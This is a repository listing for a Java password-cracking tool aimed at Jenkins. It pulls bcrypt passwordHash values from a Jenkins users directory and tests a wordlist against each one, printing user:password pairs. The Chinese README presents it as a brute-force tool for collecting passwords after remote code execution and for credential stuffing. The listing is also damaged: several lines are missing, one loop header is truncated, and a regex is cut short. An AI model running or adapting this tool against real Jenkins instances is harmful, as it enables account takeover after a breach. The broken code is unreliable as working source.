├── BcryptCrack
    ├── BcryptCrack-1.0-SNAPSHOT.jar
    ├── BcryptCrack.iml
    ├── pom.xml
    └── src
    │   └── main
    │       └── java
    │           └── com
    │               └── cat
    │                   └── bc
    │                       └── BcryptCrack.java
├── BcryptCrack_Jenkins
    ├── BcryptCrack.iml
    ├── BcryptCrack_Jenkins-1.0-SNAPSHOT.jar
    ├── pom.xml
    └── src
    │   └── main
    │       └── java
    │           └── com
    │               └── cat
    │                   └── bc
    │                       ├── BcryptCrack.java
    │                       └── GetXML.java
└── README.md

/BcryptCrack/BcryptCrack-1.0-SNAPSHOT.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/rabbitmask/BcryptCrack_Jenkins/59b3816c4a1b980bbcb5d9ac01bff4d2275c0a70/BcryptCrack/BcryptCrack-1.0-SNAPSHOT.jar
--------------------------------------------------------------------------------
/BcryptCrack/BcryptCrack.iml:
--------------------------------------------------------------------------------
1 |
2 |
--------------------------------------------------------------------------------
/BcryptCrack/pom.xml:
--------------------------------------------------------------------------------
1 |
2 |
5 | 4.0.0
6 |
7 | org.example
8 | BcryptCrack
9 | 1.0-SNAPSHOT
10 |
11 |
12 |
13 |
14 | org.mindrot
15 | jbcrypt
16 | 0.4
17 |
18 |
19 |
20 |
21 |
22 |
23 | org.apache.maven.plugins
24 | maven-shade-plugin
25 | 1.2.1
26 |
27 |
28 | package
29 |
30 | shade
31 |
32 |
33 |
34 |
36 | com.cat.bc.BcryptCrack
37 |
38 |
39 |
40 |
41 |
42 |
43 |
44 |
45 |
46 |
47 | 8
48 | 8
49 |
50 |
51 |
--------------------------------------------------------------------------------
/BcryptCrack/src/main/java/com/cat/bc/BcryptCrack.java:
--------------------------------------------------------------------------------
1 | package com.cat.bc;
2 |
3 | import org.mindrot.jbcrypt.BCrypt;
4 |
5 | import java.io.IOException;
6 | import java.nio.file.Files;
7 | import java.nio.file.Paths;
8 | import java.util.ArrayList;
9 | import java.util.List;
10 | import java.util.Scanner;
11 |
12 |
     // Console utility: reads one bcrypt hash and a wordlist path from standard input and
     // tests each wordlist line against the hash with jBCrypt's BCrypt.checkpw.
13 | public class BcryptCrack {
         // Entry point. Prints two prompts (the runtime strings are Chinese: "please enter
         // your ciphertext" and "please provide your dictionary"), reads one line for each,
         // loads the wordlist with readTxt and hands both to getPass. args is not used.
14 |     public static void main(String[] args) {
15 |
16 |         Scanner h = new Scanner(System.in);
17 |         System.out.print("请输入您的密文:");
18 |         String hashed = h.nextLine();
19 |
20 |         Scanner p = new Scanner(System.in);
21 |         System.out.print("请提供您的字典:");
22 |         String Pass_Path = p.nextLine();
23 |
24 |         List pass = readTxt(Pass_Path);
25 |
26 |         getPass(hashed,pass);
27 |
28 |     }
29 |
30 |
         // Checks every entry of pass against hashed and prints the first entry that
         // BCrypt.checkpw accepts (prefixed with the Chinese for "cracked successfully"),
         // then stops. Nothing is printed when no entry matches.
         //   hashed - the bcrypt hash string typed by the user
         //   pass   - candidate strings; a raw List whose elements are cast to String
31 |     public static void getPass(String hashed, List pass) {
             // Only evaluated when the JVM runs with assertions enabled (-ea).
32 |         assert pass != null;
33 |         for (Object o : pass) {
                 // checkpw recomputes the hash from the salt and cost factor encoded in hashed,
                 // so the time spent per candidate is set by the cost chosen when the hash was
                 // created.
34 |             if (BCrypt.checkpw((String) o, hashed)) {
35 |                 System.out.println("破解成功:" + o);
36 |                 break;
37 |             }
38 |         }
39 |     }
40 |
41 |     // Read a TXT file and return its lines as a list.
         // On IOException the stack trace is printed and the empty list created below is
         // returned, so a missing or unreadable wordlist produces no candidates.
42 |     public static List readTxt(String filePath) {
43 |         List fileList = new ArrayList<>();
44 |         try {
45 |             fileList = Files.readAllLines(Paths.get(filePath));
46 |         } catch (IOException e) {
47 |             e.printStackTrace();
48 |         }
49 |         return fileList;
50 |     }
51 |
52 | }
53 |
54 |
55 |
--------------------------------------------------------------------------------
/BcryptCrack_Jenkins/BcryptCrack.iml:
--------------------------------------------------------------------------------
1 |
2 |
--------------------------------------------------------------------------------
/BcryptCrack_Jenkins/BcryptCrack_Jenkins-1.0-SNAPSHOT.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/rabbitmask/BcryptCrack_Jenkins/59b3816c4a1b980bbcb5d9ac01bff4d2275c0a70/BcryptCrack_Jenkins/BcryptCrack_Jenkins-1.0-SNAPSHOT.jar
--------------------------------------------------------------------------------
/BcryptCrack_Jenkins/pom.xml:
--------------------------------------------------------------------------------
1 |
2 |
5 | 4.0.0
6 |
7 | org.example
8 | BcryptCrack
9 | 1.0-SNAPSHOT
10 |
11 |
12 |
13 |
14 | org.mindrot
15 | jbcrypt
16 | 0.4
17 |
18 |
19 |
20 | org.apache.commons
21 | commons-lang3
22 | 3.11
23 |
24 |
25 |
26 | dom4j
27 | dom4j
28 | 1.6.1
29 |
30 |
31 |
32 |
33 |
34 |
35 |
36 |
37 | org.apache.maven.plugins
38 | maven-shade-plugin
39 | 1.2.1
40 |
41
|
42 | package
43 |
44 | shade
45 |
46 |
47 |
48 |
50 | com.cat.bc.BcryptCrack
51 |
52 |
53 |
54 |
55 |
56 |
57 |
58 |
59 |
60 |
61 | 8
62 | 8
63 |
64 |
65 |
--------------------------------------------------------------------------------
/BcryptCrack_Jenkins/src/main/java/com/cat/bc/BcryptCrack.java:
--------------------------------------------------------------------------------
1 | package com.cat.bc;
2 |
3 |
4 | import org.mindrot.jbcrypt.BCrypt;
5 |
6 | import java.io.IOException;
7 | import java.nio.file.Files;
8 | import java.nio.file.Paths;
9 | import java.util.*;
10 |
11 |
     // Variant of the single-hash tool that takes a Jenkins users directory instead of one
     // hash: it reads users.xml, pulls the passwordHash field out of each user's config.xml
     // and runs the same wordlist check once per user.
     // NOTE(review): generic type arguments do not appear anywhere in this listing (raw
     // List / Map), although the code calls String methods on their elements - presumably
     // they were lost when the page was extracted.
12 | public class BcryptCrack {
13 |
14 |
         // Entry point. Prompts (in Chinese) for the JENKINS_HOME/users directory and for a
         // wordlist path, builds the user map, then for every key reads that user's hash
         // and runs the wordlist check. Any exception raised while handling a user is caught
         // and discarded (the printStackTrace call is commented out), so that user is
         // skipped with no output. args is not used.
15 |     public static void main(String[] args) {
16 |
17 |
18 |         Scanner u = new Scanner(System.in);
19 |         System.out.print("请提供 JENKINS_HOME/users 目录:");
20 |         String Users_Path = u.nextLine();
21 |
22 |         Scanner p = new Scanner(System.in);
23 |         System.out.print("请提供您的字典:");
24 |         String Pass_Path = p.nextLine();
25 |
26 |         List pass = readTxt(Pass_Path);
27 |
28 |         Map usermap = getUserMap(Users_Path);
29 |
30 |         for (String key : usermap.keySet()) {
31 |             try {
32 |                 String passwordHash=getUserHashed(Users_Path,usermap.get(key));
33 |                 getPass(key,passwordHash,pass);
34 |             } catch (Exception e) {
35 | //                e.printStackTrace();
36 |             }
37 |
38 |         }
39 |
40 |     }
41 |
         // Returns the first passwordHash value found in
         // <Users_Path>\<userConfigName>\config.xml with the "#jbcrypt:" prefix removed; main
         // passes the result on to the BCrypt.checkpw loop.
         // The path is assembled with literal backslash separators.
         // An IOException while reading is discarded and leaves xml null; the extraction call
         // below then throws, as does get(0) on an empty list, and main's catch absorbs both.
         // Defensive relevance: everything read here is an ordinary file under the Jenkins
         // users directory, so read access to that directory is all that offline guessing
         // against these hashes requires; filesystem permissions on JENKINS_HOME are a
         // primary control.
42 |     public static String getUserHashed(String Users_Path,String userConfigName) {
43 |         String xml = null;
44 |         try {
45 |             xml = GetXML.LoadContentByPath(Users_Path+"\\"+userConfigName+"\\config.xml");
46 |         } catch (IOException e) {
47 | //            e.printStackTrace();
48 |         }
49 |         List passwordHash =GetXML.getFieldListByRegex(xml,"passwordHash");
50 |         return (passwordHash.get(0).replace("#jbcrypt:",""));
51 |
52 |     }
53 |
54 |
         // Reads <Users_Path>\users.xml and collects the text of its "string" fields.
         // In main, each key of the returned map is used as the printed user label and each
         // value as the per-user directory name handed to getUserHashed.
         // An IOException is printed and leaves xml null.
55 |     public static Map getUserMap(String Users_Path){
56 |         String xml = null;
57 |         try {
58 |             xml = GetXML.LoadContentByPath(Users_Path+"\\users.xml");
59 |         } catch (IOException e) {
60 |             e.printStackTrace();
61 |         }
62 |         List user_hashed =GetXML.getFieldListByRegex(xml,"string");
63 |         Map m = new HashMap<>();
64 |
             // NOTE(review): the listing jumps from line 65 to line 74 and the loop header is
             // truncated - presumably markup stripping during page extraction. The loop body,
             // the end of getUserMap and the signature of the next method are not visible;
             // judging by the call in main, that method is getPass(user, hashed, pass).
             // The visible body runs the same wordlist check as the single-hash tool and
             // prints "user:candidate" for the first entry BCrypt.checkpw accepts.
65 |         for(int i=0;i pass) {
             // Only evaluated when the JVM runs with assertions enabled (-ea).
74 |         assert pass != null;
75 |         for (Object o : pass) {
76 |             if (BCrypt.checkpw((String) o, hashed)) {
77 |                 System.out.println(user+":" + o);
78 |                 break;
79 |             }
80 |         }
81 |     }
82 |
83 |
         // Reads the file at filePath and returns its lines as a list. On IOException the
         // stack trace is printed and the empty list created below is returned.
84 |     public static List readTxt(String filePath) {
85 |         List fileList = new ArrayList<>();
86 |         try {
87 |             fileList = Files.readAllLines(Paths.get(filePath));
88 |         } catch (IOException e) {
89 |             e.printStackTrace();
90 |         }
91 |         return fileList;
92 |     }
93 |
94 |
95 | }
96 |
97 |
98 |
--------------------------------------------------------------------------------
/BcryptCrack_Jenkins/src/main/java/com/cat/bc/GetXML.java:
--------------------------------------------------------------------------------
1 | package com.cat.bc;
2 |
3 | import org.apache.commons.lang3.StringUtils;
4 |
5 | import java.io.*;
6 | import java.util.ArrayList;
7 | import java.util.List;
8 | import java.util.regex.Matcher;
9 | import java.util.regex.Pattern;
10 |
11 |
     // Helpers that read a file into one string and pull element text out of it with a
     // regular expression; no XML parser is involved in the code shown.
12 | public class GetXML {
13 |
         // Reads the file at path line by line and returns the lines concatenated without
         // line separators. InputStreamReader is created without a charset, so the platform
         // default applies. The stream and reader are not closed in this method.
         // Throws IOException when the file cannot be opened or read.
14 |     public static String LoadContentByPath(String path) throws IOException {
15 |         InputStream is = new FileInputStream(path);
16 |         BufferedReader in = new BufferedReader(new InputStreamReader(is));
17 |         StringBuilder buffer = new StringBuilder();
18 |         String line = "";
19 |         while ((line = in.readLine()) != null){
20 |             buffer.append(line);
21 |         }
22 |         return buffer.toString();
23 |
24 |     }
25 |
         // Returns the trimmed, non-empty capture-group values for every match of the
         // label pattern in xml. label is concatenated into the regex unescaped; the callers
         // shown pass the constants "passwordHash" and "string". A null xml makes
         // pattern.matcher throw NullPointerException.
26 |     public static List getFieldListByRegex(String xml, String label) {
27 |         // Regular expression.
             // NOTE(review): as shown, the pattern has no closing-tag part, so the lazy group
             // would always match empty text; the closing tag was probably stripped from this
             // listing during extraction - confirm against the repository.
28 |         String regex = "<" + label + ">(.*?)";
29 |         Pattern pattern = Pattern.compile(regex);
30 |         Matcher m = pattern.matcher(xml);
31 |         // There may be several matches.
32 |         List fieldList = new ArrayList<>();
33 |         while (m.find()) {
34 |             if (StringUtils.isNotEmpty(m.group(1).trim())) {
35 |                 fieldList.add(m.group(1).trim());
36 |             }
37 |         }
38 |         return fieldList;
39 |     }
40 |
41 | }
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # BcryptCrack_Jenkins
2 |
3 | 针对Jenkins控制台用户的暴力破解工具
4 |
5 | 适用场景:RCE之后的密码收集、撞库等
6 |
7 | ### Demo:
8 | ```
9 | java -jar BcryptCrack_Jenkins-1.0-SNAPSHOT.jar
10 | 请提供 JENKINS_HOME/users 目录:
11 | 请提供您的字典:
12 | ```
13 |
--------------------------------------------------------------------------------